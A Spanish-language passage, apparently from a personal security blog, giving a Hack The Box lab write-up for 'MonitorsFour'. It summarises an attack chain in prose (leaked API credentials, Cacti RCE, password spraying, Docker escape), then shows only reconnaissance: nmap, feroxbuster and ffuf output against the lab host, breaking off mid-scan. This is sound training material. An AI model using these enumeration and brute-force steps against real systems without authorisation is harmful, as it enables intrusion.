https://sckull.github.io/tags/docker-desktop-4.44.2/ Recent content in Docker-Desktop-4.44.2 on sckull Hugo -- gohugo.io es ©{year}, All Rights Reserved Sat, 23 May 2026 00:00:00 +0000 daily daily https://sckull.github.io/posts/monitorsfour/ Sat, 23 May 2026 00:00:00 +0000 Sat, 23 May 2026 00:00:00 +0000 https://sckull.github.io/posts/monitorsfour/ MonitorsFour corre un sitio web donde se descubrio una API. Esta, exponia las credenciales de usuarios, lo que permitio el acceso al sitio. <div class="featured-image__wrapper"> <img src="https://sckull.github.io/images/posts/htb/monitorsfour/cover.png" alt="featured image" class="featured-image" style="width: ;height: ;"> </div> <p>MonitorsFour corre un sitio web donde se descubrio una API. Esta, exponia las credenciales de usuarios, lo que permitio el acceso al sitio. Tambien, se encontro Cacti con una vulnerabilidad RCE. Se ejecuto Password Spraying para obtener credenciales validas que permitieron la explotacion y acceso a un contenedor docker. El sitio principal mencionaba la version de docker, la cual se encontro vulnerable, tras la explotacion, se logro acceso privilegiado al almacenamiento host. Finalmente se modifico una tarea programada para obtener acceso privilegiado en el host.</p> <table> <thead> <tr> <th>Nombre</th> <th align="center"><a href="https://app.hackthebox.com/machines/814">MonitorsFour</a></th> </tr> </thead> <tbody> <tr> <td><strong>OS</strong></td> <td align="center"><span><p class="os_type"> Windows <img src="https://sckull.github.io/images/icons/windows.png" class="img_type_os"/></p></span></td> </tr> <tr> <td><strong>Puntos</strong></td> <td align="center">20</td> </tr> <tr> <td><strong>Dificultad</strong></td> <td align="center">Easy</td> </tr> <tr> <td><strong>Fecha de Salida</strong></td> <td align="center">2025-12-06</td> </tr> <tr> <td><strong>IP</strong></td> <td align="center">10.129.100.42</td> </tr> <tr> <td><strong>Maker</strong></td> <td align="center"><span><p class="user_maker"> <a href="https://www.hackthebox.eu/home/users/profile/114053">TheCyberGeek</a><img src="https://www.hackthebox.eu/badge/image/114053" class="img_user_maker"/> </p><hr style="opacity:25%;"><p class="user_maker2"> <a href="https://www.hackthebox.eu/home/users/profile/389926">kavigihan</a><img src="https://www.hackthebox.eu/badge/image/389926" class="img_user_maker"/></p> </span></td> </tr> <tr> <td> <a href="#" class="button" style="width: 72px; height: 30px; pointer-events: none;" data-color="default" target="_blank" rel="noreferrer"> <span class="button__text"> Rated </span> </a></td> <td align="center"><div class="box"><pre tabindex="0"><code class="language-chart" data-lang="chart">{ &#34;type&#34;: &#34;bar&#34;, &#34;data&#34;: { &#34;labels&#34;: [&#34;Cake&#34;, &#34;VeryEasy&#34;, &#34;Easy&#34;, &#34;TooEasy&#34;, &#34;Medium&#34;, &#34;BitHard&#34;,&#34;Hard&#34;,&#34;TooHard&#34;,&#34;ExHard&#34;,&#34;BrainFuck&#34;], &#34;datasets&#34;: [{ &#34;label&#34;: &#34;User Rated Difficulty&#34;, &#34;data&#34;: [211, 285, 1520, 1673, 875, 346, 239, 74, 32, 92], &#34;backgroundColor&#34;: [&#34;#9fef00&#34;,&#34;#9fef00&#34;,&#34;#9fef00&#34;, &#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;,&#34;#ffaf00&#34;, &#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;,&#34;#ff3e3e&#34;] }] }, &#34;options&#34;: { &#34;scales&#34;: { &#34;xAxes&#34;: [{&#34;display&#34;: false}], &#34;yAxes&#34;: [{&#34;display&#34;: false}] }, &#34;legend&#34;: {&#34;labels&#34;: {&#34;fontColor&#34;: &#34;white&#34;}}, &#34;responsive&#34;: true } } </code></pre></div></td> </tr> </tbody> </table> <h1 id="recon">Recon</h1> <h2 id="nmap">nmap</h2> <p><code>nmap</code> muestra multiples puertos abiertos: http (80) y WinRM (5985).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># Nmap 7.95 scan initiated Sat Dec 6 20:42:07 2025 as: /usr/lib/nmap/nmap --privileged -p80,5985 -sV -sC -oN nmap_scan 10.129.45.249</span> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.129.45.249 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.069s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">80/tcp open http nginx </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Did not follow redirect to http://monitorsfour.htb/ </span></span><span class="line"><span class="cl">5985/tcp open http Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl">Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl"><span class="c1"># Nmap done at Sat Dec 6 20:42:19 2025 -- 1 IP address (1 host up) scanned in 12.00 seconds</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="web-site">Web Site</h2> <p>El sitio web nos redirige al dominio <code>monitorsfour.htb</code> el cual agregamos al archivo <code>/etc/hosts</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ curl -sI 10.129.45.249 </span></span><span class="line"><span class="cl">HTTP/1.1 <span class="m">302</span> Moved Temporarily </span></span><span class="line"><span class="cl">Server: nginx </span></span><span class="line"><span class="cl">Date: Sun, <span class="m">07</span> Dec <span class="m">2025</span> 02:42:49 GMT </span></span><span class="line"><span class="cl">Content-Type: text/html </span></span><span class="line"><span class="cl">Content-Length: <span class="m">138</span> </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Location: http://monitorsfour.htb/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><p>Se describe servicios de Networking.</p> <p><img src="https://sckull.github.io/images/posts/htb/monitorsfour/2025_0612340054505.png" alt="image" /></p> <p>Existe un formulario para login.</p> <p><img src="https://sckull.github.io/images/posts/htb/monitorsfour/2025_0612340554555.png" alt="image" /></p> <h3 id="directory-brute-forcing">Directory Brute Forcing</h3> <p><code>feroxbuster</code> muestra contenido estatico, vistas y contenido relacionado a un administrador.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ feroxbuster -u http://monitorsfour.htb/ -w <span class="nv">$CM</span> -x php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> ___ ___ __ __ __ __ __ ___ </span></span><span class="line"><span class="cl"><span class="p">|</span>__ <span class="p">|</span>__ <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span>__<span class="o">)</span> <span class="p">|</span> / <span class="sb">`</span> / <span class="se">\ \_</span>/ <span class="p">|</span> <span class="p">|</span> <span class="se">\ </span><span class="p">|</span>__ </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="p">|</span>___ <span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\ </span><span class="p">|</span> <span class="se">\_</span>_, <span class="se">\_</span>_/ / <span class="se">\ </span><span class="p">|</span> <span class="p">|</span>__/ <span class="p">|</span>___ </span></span><span class="line"><span class="cl">by Ben <span class="s2">&#34;epi&#34;</span> Risher 🤓 ver: 2.13.0 </span></span><span class="line"><span class="cl">───────────────────────────┬────────────────────── </span></span><span class="line"><span class="cl"> 🎯 Target Url │ http://monitorsfour.htb/ </span></span><span class="line"><span class="cl"> 🚩 In-Scope Url │ monitorsfour.htb </span></span><span class="line"><span class="cl"> 🚀 Threads │ <span class="m">50</span> </span></span><span class="line"><span class="cl"> 📖 Wordlist │ /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"> 👌 Status Codes │ All Status Codes! </span></span><span class="line"><span class="cl"> 💥 Timeout <span class="o">(</span>secs<span class="o">)</span> │ <span class="m">7</span> </span></span><span class="line"><span class="cl"> 🦡 User-Agent │ feroxbuster/2.13.0 </span></span><span class="line"><span class="cl"> 💉 Config File │ /etc/feroxbuster/ferox-config.toml </span></span><span class="line"><span class="cl"> 🔎 Extract Links │ <span class="nb">true</span> </span></span><span class="line"><span class="cl"> 💲 Extensions │ <span class="o">[</span>php<span class="o">]</span> </span></span><span class="line"><span class="cl"> 🏁 HTTP methods │ <span class="o">[</span>GET<span class="o">]</span> </span></span><span class="line"><span class="cl"> 🔃 Recursion Depth │ <span class="m">4</span> </span></span><span class="line"><span class="cl">───────────────────────────┴────────────────────── </span></span><span class="line"><span class="cl"> 🏁 Press <span class="o">[</span>ENTER<span class="o">]</span> to use the Scan Management Menu™ </span></span><span class="line"><span class="cl">────────────────────────────────────────────────── </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 0l 0w 0c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">403</span> GET 7l 9w 146c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">404</span> GET 7l 11w 146c Auto-filtering found 404-like response and created new filter<span class="p">;</span> toggle off with --dont-filter </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 5l 30w 1616c http://monitorsfour.htb/static/images/services/01.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 235w 12063c http://monitorsfour.htb/static/images/review.svg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 71l 130w 1872c http://monitorsfour.htb/static/js/custom.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 5l 369w 21003c http://monitorsfour.htb/static/js/popper.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 24l 99w 770c http://monitorsfour.htb/static/js/smoothscroll.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 109l 619w 13655c http://monitorsfour.htb/static/images/service.svg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 19l 62w 3695c http://monitorsfour.htb/static/images/services/04.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 6l 34w 2166c http://monitorsfour.htb/static/images/services/02.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 96l 239w 4340c http://monitorsfour.htb/login </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 11l 15w 188c http://monitorsfour.htb/static/css/plugins.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 9l 43w 3028c http://monitorsfour.htb/static/images/services/03.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 38l 117w 2813c http://monitorsfour.htb/static/js/plugins.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 4l 1293w 86709c http://monitorsfour.htb/static/js/jquery-min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 683w 60010c http://monitorsfour.htb/static/js/bootstrap.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 393w 15974c http://monitorsfour.htb/static/images/about-us.svg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 935l 1752w 15174c http://monitorsfour.htb/static/css/style.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 359w 22207c http://monitorsfour.htb/static/images/banner.svg </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 129l 673w 57007c http://monitorsfour.htb/static/admin/assets/images/logo.png </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 277w 44342c http://monitorsfour.htb/static/js/owl.carousel.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 87l 1326w 157954c http://monitorsfour.htb/static/admin/assets/images/logo.ico </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 338l 982w 13688c http://monitorsfour.htb/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/controllers <span class="o">=</span>&gt; http://monitorsfour.htb/controllers/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 4l 35w 367c http://monitorsfour.htb/contact </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 2l 210w 12507c http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/pace.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 607l 1130w 16986c http://monitorsfour.htb/static/admin/assets/js/core/app.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 7l 430w 36816c http://monitorsfour.htb/static/admin/assets/js/core/libraries/bootstrap.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 6l 184w 9227c http://monitorsfour.htb/static/admin/assets/js/plugins/loaders/blockui.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 1w 37820c http://monitorsfour.htb/static/admin/assets/css/minified/colors.min.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1190l 1226w 47483c http://monitorsfour.htb/static/admin/assets/css/icons/icomoon/styles.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 4l 1305w 84345c http://monitorsfour.htb/static/admin/assets/js/core/libraries/jquery.min.js </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 1430w 108349c http://monitorsfour.htb/static/admin/assets/css/minified/core.min.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 5059w 256503c http://monitorsfour.htb/static/admin/assets/css/minified/components.min.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 1733w 122310c http://monitorsfour.htb/static/admin/assets/css/minified/bootstrap.min.css </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 84l 212w 3099c http://monitorsfour.htb/forgot-password </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 4734l 29110w 2364586c http://monitorsfour.htb/static/admin/assets/images/servers.png </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static <span class="o">=</span>&gt; http://monitorsfour.htb/static/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/admin <span class="o">=</span>&gt; http://monitorsfour.htb/static/admin/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 1l 3w 35c http://monitorsfour.htb/user </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/views <span class="o">=</span>&gt; http://monitorsfour.htb/views/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/views/admin <span class="o">=</span>&gt; http://monitorsfour.htb/views/admin/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/admin/assets <span class="o">=</span>&gt; http://monitorsfour.htb/static/admin/assets/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/css <span class="o">=</span>&gt; http://monitorsfour.htb/static/css/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 215l 592w 9229c http://monitorsfour.htb/views/admin/api.php </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/fonts <span class="o">=</span>&gt; http://monitorsfour.htb/static/fonts/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 197l 537w 8471c http://monitorsfour.htb/views/admin/changelog.php </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/images <span class="o">=</span>&gt; http://monitorsfour.htb/static/images/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/admin/assets/css <span class="o">=</span>&gt; http://monitorsfour.htb/static/admin/assets/css/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 221l 580w 9491c http://monitorsfour.htb/views/admin/customers.php </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 653l 1652w 28212c http://monitorsfour.htb/views/admin/dashboard.php </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/js <span class="o">=</span>&gt; http://monitorsfour.htb/static/js/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 84l 212w 3099c http://monitorsfour.htb/views/forgot_password.php </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 20l 36w 302c http://monitorsfour.htb/views/admin/footer.php </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 338l 982w 13688c http://monitorsfour.htb/views/index.php </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/images/blog <span class="o">=</span>&gt; http://monitorsfour.htb/static/images/blog/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/admin/assets/images <span class="o">=</span>&gt; http://monitorsfour.htb/static/admin/assets/images/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 96l 239w 4340c http://monitorsfour.htb/views/login.php </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 415l 1069w 19023c http://monitorsfour.htb/views/admin/invoices.php </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/admin/assets/js <span class="o">=</span>&gt; http://monitorsfour.htb/static/admin/assets/js/ </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/admin/assets/swf <span class="o">=</span>&gt; http://monitorsfour.htb/static/admin/assets/swf/ </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 217l 573w 9317c http://monitorsfour.htb/views/admin/tasks.php </span></span><span class="line"><span class="cl"><span class="m">200</span> GET 321l 800w 13987c http://monitorsfour.htb/views/admin/users.php </span></span><span class="line"><span class="cl"><span class="m">301</span> GET 7l 11w 162c http://monitorsfour.htb/static/images/services <span class="o">=</span>&gt; http://monitorsfour.htb/static/images/services/ </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h4 id="views">Views</h4> <p>Las vistas (<code>views/*</code>) no parecen estar protegidas y, muestra el contenido de distintas paginas, exponiendo funcionalidades de administrador.</p> <p><img src="https://sckull.github.io/images/posts/htb/monitorsfour/2025_0612340125112.png" alt="image" /><br /> <img src="https://sckull.github.io/images/posts/htb/monitorsfour/2025_0612340595159.png" alt="image" /></p> <p>El codigo html de <code>api.php</code> muestra un enlace a un endpoint de una API.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p">&lt;</span><span class="nt">ul</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;dropdown-menu dropdown-menu-right&#34;</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"> <span class="p">&lt;</span><span class="nt">li</span><span class="p">&gt;&lt;</span><span class="nt">a</span> <span class="na">href</span><span class="o">=</span><span class="s">&#34;/api/v1/logout&#34;</span><span class="p">&gt;&lt;</span><span class="nt">i</span> <span class="na">class</span><span class="o">=</span><span class="s">&#34;icon-switch2&#34;</span><span class="p">&gt;&lt;/</span><span class="nt">i</span><span class="p">&gt;</span> Logout<span class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;&lt;/</span><span class="nt">li</span><span class="p">&gt;</span> </span></span><span class="line"><span class="cl"><span class="p">&lt;/</span><span class="nt">ul</span><span class="p">&gt;</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="subdomain-discovery">Subdomain Discovery</h2> <p>Tras ejecutar <code>ffuf</code> este muestra el subdominio <code>cacti</code>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H <span class="s2">&#34;Host: FUZZ.monitorsfour.htb&#34;</span> -u http://monitorsfour.htb -fl <span class="m">8</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://monitorsfour.htb </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/namelist.txt </span></span><span class="line"><span class="cl"> :: Header : Host: FUZZ.monitorsfour.htb </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl"> :: Filter : Response lines: <span class="m">8</span> </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cacti <span class="o">[</span>Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 81ms<span class="o">]</span> </span></span><span class="line"><span class="cl">❯ </span></span></code></pre></td></tr></table> </div> </div><h1 id="api---website">API - Website</h1> <p><code>ffuf</code> muestra multiples endpoints.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">❯ ffuf -w <span class="nv">$CM</span> -u http://monitorsfour.htb/api/v1/FUZZ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /<span class="s1">&#39;___\ /&#39;</span>___<span class="se">\ </span> /<span class="err">&#39;</span>___<span class="se">\ </span> </span></span><span class="line"><span class="cl"> /<span class="se">\ \_</span>_/ /<span class="se">\ \_</span>_/ __ __ /<span class="se">\ \_</span>_/ </span></span><span class="line"><span class="cl"> <span class="se">\ \ </span>,__<span class="se">\\</span> <span class="se">\ </span>,__<span class="se">\/\ \/\ \ \ \ </span>,__<span class="se">\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\ \ \_</span>/ <span class="se">\ \ \_</span>/<span class="se">\ \ \_\ \ \ \ \_</span>/ </span></span><span class="line"><span class="cl"> <span class="se">\ \_\ </span> <span class="se">\ \_\ </span> <span class="se">\ \_</span>___/ <span class="se">\ \_\ </span> </span></span><span class="line"><span class="cl"> <span class="se">\/</span>_/ <span class="se">\/</span>_/ <span class="se">\/</span>___/ <span class="se">\/</span>_/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> v2.1.0-dev </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> :: Method : GET </span></span><span class="line"><span class="cl"> :: URL : http://monitorsfour.htb/api/v1/FUZZ </span></span><span class="line"><span class="cl"> :: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt </span></span><span class="line"><span class="cl"> :: Follow redirects : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Calibration : <span class="nb">false</span> </span></span><span class="line"><span class="cl"> :: Timeout : <span class="m">10</span> </span></span><span class="line"><span class="cl"> :: Threads : <span class="m">40</span> </span></span><span class="line"><span class="cl"> :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 </span></span><span class="line"><span class="cl">________________________________________________ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">.htpasswd <span class="o">[</span>Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 153ms<span class="o">]</span> </span></span><span class="line"><span class="cl">.hta <span class="o">[</span>Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 155ms<span class="o">]</span> </span></span><span class="line"><span class="cl">.htaccess <span class="o">[</span>Status: 403, Size: 146, Words: 3, Lines: 8, Duration: 156ms<span class="o">]</span> </span></span><span class="line"><span class="cl">auth 